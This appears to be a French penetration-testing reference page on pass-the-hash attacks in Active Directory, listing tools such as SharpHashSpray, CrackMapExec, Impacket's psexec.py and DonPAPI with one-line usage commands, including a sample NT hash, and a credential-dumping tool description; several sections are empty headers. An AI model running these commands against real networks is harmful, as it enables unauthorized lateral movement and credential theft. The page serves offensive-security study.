search

🔪Pass The Hash

hashtag
SharpHashSpray

Un outil compatible avec l'assemblage d'exécution pour tester les hachages d'administration locale sur un domaine Active Directory.

Exemple d'utilisation:

$ SharpHashSpray.exe Administrator <hash>

ressource: https://github.com/RedCursorSecurityConsulting/SharpHashSprayarrow-up-right

hashtag
SMB

hashtag
Crackmapexec

crackmapexec smb <target IP> -u '<username>' -H '<hash>'

hashtag
Impacket

hashtag
Psexec

hashtag
psexec.py

python psexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 <username>@<target IP>

hashtag
WMI

hashtag
wmiexec.py

hashtag
RPC

hashtag
rpcdump.py

hashtag
Exécution de commandes à distance

hashtag
atexec.py

hashtag
Lookupsid.py

hashtag
Samrdump.py

hashtag
reg.py

hashtag
DonPAPI

DonPAPI permet de dumper les identifiants sur une machine à distance (LSA, DPAPI, SAM, WIFI, Vaults, Chromes secrets, Mozilla secrets, mRemoteNG secrets, mots de passe VNC et autres).

Exemple d'utilisation:

Ressource: https://github.com/login-securite/DonPAPIarrow-up-right

hashtag
PTH Toolkit

En 2012, un tas de scripts pass-the-hash ont été introduits lors de la conférence BlackHat USA cette année-là. Ils étaient disponibles sur Google Code Archive. En raison de leur convivialité et de leur popularité, Kali Linux les a présentés à la version 2013. Ils ont inclus les scripts suivants dans leur pth-toolkit.

  • pth-curl

  • pth-rpcclient

  • pth-smbget

  • pth-winexe

  • pth-wmic

  • pth-net

  • pth-smbclient

  • pth-sqsh

  • pth-wmic

PrécédentMouvements latérauxSuivantOver Pass The Hash

Mis à jour